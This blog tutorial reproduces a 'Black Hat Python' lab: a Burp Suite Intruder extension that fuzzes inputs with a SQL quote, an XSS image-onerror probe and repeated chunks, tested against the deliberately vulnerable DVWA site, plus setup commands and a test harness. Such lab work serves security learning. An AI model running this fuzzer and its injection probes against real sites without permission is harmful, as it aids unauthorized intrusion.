
Python Penetration Testing Primer: Burpsuite Payload Generator

Author: AILX10

Recently I received a network security book, "Python Black Hat", presented by the Electronic Industry Press. The book contains 24 experiments in total, and today I reproduce the 15th one (the BurpSuite payload generator plugin). My test environment is an MBP computer + a Kali virtual machine + the DVWA online range. At present only Python 2.7 is supported, so I adjusted the symlink slightly. I then uninstalled the JDK and Burpsuite on Kali, finally used JDK 1.8 and Burpsuite 1.7.36, and successfully reproduced this experiment. By the way, after doing many experiments, I am familiar with it~


Step 1: Prepare the environment

Install JDK 1.8

apt-get update
apt-get install software-properties-common
apt-add-repository 'deb http://security.debian.org/debian-security stretch/updates main'
apt-get update
apt-get install openjdk-8-jdk           

Select JDK1.8

update-alternatives --config java           

Point the python symlink at python2

ln -s /usr/bin/python2 /usr/bin/python           

Install an earlier version of Burpsuite 1.7.36

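# Quote the URL so the shell does not treat "&" as a background operator,
# and name the output file so the following commands find it
wget -O burpsuite_community_linux_v1_7_36.sh 'https://portswigger.net/burp/releases/download?product=community&version=1.7.36&type=linux'
sudo chmod +x burpsuite_community_linux_v1_7_36.sh
sudo ./burpsuite_community_linux_v1_7_36.sh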

The extension imports successfully. Note that the path must not contain Chinese characters.


Step 2: Prepare the experimental site

Use the DVWA online range [1].

Step 3: Actual combat drill

1. Open the XSS injection module and submit a string


2. Then, in Burp's Proxy module, send the payload to the Intruder module


3. On the Payloads page of the Intruder module, set the payload type to Extension-generated, then select BHP Payload Generator under Payload Options, and you are done~


4. Click Start Attack. The test did actually produce the pop-up here, but the results are not displayed in a friendly way


Reference Code:

# -*- coding: utf-8 -*-
# @Time    : 2022/6/14 7:15 PM
# @Author  : ailx10
# @File    : bhf_fuzzer.py

from burp import IBurpExtender
from burp import IIntruderPayloadGeneratorFactory
from burp import IIntruderPayloadGenerator

from java.util import List,ArrayList
import random

class BurpExtender(IBurpExtender,IIntruderPayloadGeneratorFactory):
    def registerExtenderCallbacks(self,callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()

        callbacks.registerIntruderPayloadGeneratorFactory(self)

        return

    def getGeneratorName(self):
        return "BHP Payload Generator"

    def createNewInstance(self,attack):
        return BHPFuzzer(self,attack)

class BHPFuzzer(IIntruderPayloadGenerator):
    def __init__(self,extender,attack):
        self._extender = extender
        self._helpers = extender._helpers
        self._attack = attack
        self.max_payloads = 10
        self.num_iterations = 0

        return

    def hasMorePayloads(self):
        if self.num_iterations == self.max_payloads:
            return False
        else:
            return True

    def getNextPayload(self,current_payload):
        payload = "".join(chr(x) for x in current_payload)
        payload = self.mutate_payload(payload)
        self.num_iterations += 1
        return payload

    def reset(self):
        self.num_iterations = 0
        return

    def mutate_payload(self,original_payload):
        picker = random.randint(1,3)
        # max(...,0) keeps randint valid when the base payload is empty
        offset = random.randint(0,max(len(original_payload)-1,0))
        front,back = original_payload[:offset],original_payload[offset:]
        # SQL
        if picker == 1:
            front += "'"
        # XSS
        elif picker == 2:
            front += "<img src=xss onerror=alert(1)>"
        # Randomly extract a piece of data from the original payload, repeat it any number of times,
        # and append it to the end of the front block
        elif picker == 3:
            chunk_length = random.randint(0,max(len(back)-1,0))
            repeater = random.randint(1,10)
            for _ in range(repeater):
                front += original_payload[:offset + chunk_length]

        return front + back
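
The mutation logic above can also be exercised outside Burp. The following is an added example, not part of the original post or the book's code: it reproduces the three mutations with a seeded random.Random so a run can be replayed, and checks that each mutation only inserts data at the chosen offset. The names generate and check_invariants, the seeds and the sample input are assumptions made for this illustration.

```python
import random

SQL_PROBE = "'"
XSS_PROBE = "<img src=xss onerror=alert(1)>"  # same marker string as the page's code


def mutate_payload(original_payload, rng):
    """Apply one of the page's three mutations; return (mutated, strategy, offset)."""
    picker = rng.randint(1, 3)
    # max(..., 0) keeps randint valid when the base value is empty
    offset = rng.randint(0, max(len(original_payload) - 1, 0))
    front, back = original_payload[:offset], original_payload[offset:]
    if picker == 1:
        return front + SQL_PROBE + back, "sql", offset
    if picker == 2:
        return front + XSS_PROBE + back, "xss", offset
    chunk_length = rng.randint(0, max(len(back) - 1, 0))
    repeater = rng.randint(1, 10)
    inserted = original_payload[:offset + chunk_length] * repeater
    return front + inserted + back, "repeat", offset


def generate(base, seed, max_payloads=10):
    """Replayable equivalent of one Intruder run: same seed, same payload list."""
    rng = random.Random(seed)
    return [mutate_payload(base, rng) for _ in range(max_payloads)]


def check_invariants(base, results):
    """Every mutation only inserts at `offset`, so base's prefix and suffix survive."""
    for mutated, strategy, offset in results:
        assert mutated.startswith(base[:offset])
        assert mutated.endswith(base[offset:])
        assert len(mutated) >= len(base)
        if strategy == "sql":
            assert mutated == base[:offset] + SQL_PROBE + base[offset:]
        elif strategy == "xss":
            assert XSS_PROBE in mutated
    return True


if __name__ == "__main__":
    base = "ailx10"  # constructed sample input
    run = generate(base, seed=1337)
    check_invariants(base, run)
    for mutated, strategy, offset in run:
        print("%-6s offset=%d %r" % (strategy, offset, mutated))
    assert run == generate(base, seed=1337)  # same seed replays the same payloads
    check_invariants("", generate("", seed=1))  # empty base value must not crash
```

Recording the seed alongside an Intruder run is what lets a payload that triggered a finding be regenerated later.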

References

  1. DVWA Online Range: https://www.vulnspy.com/dvwa/

Published on 2022-06-14 21:15
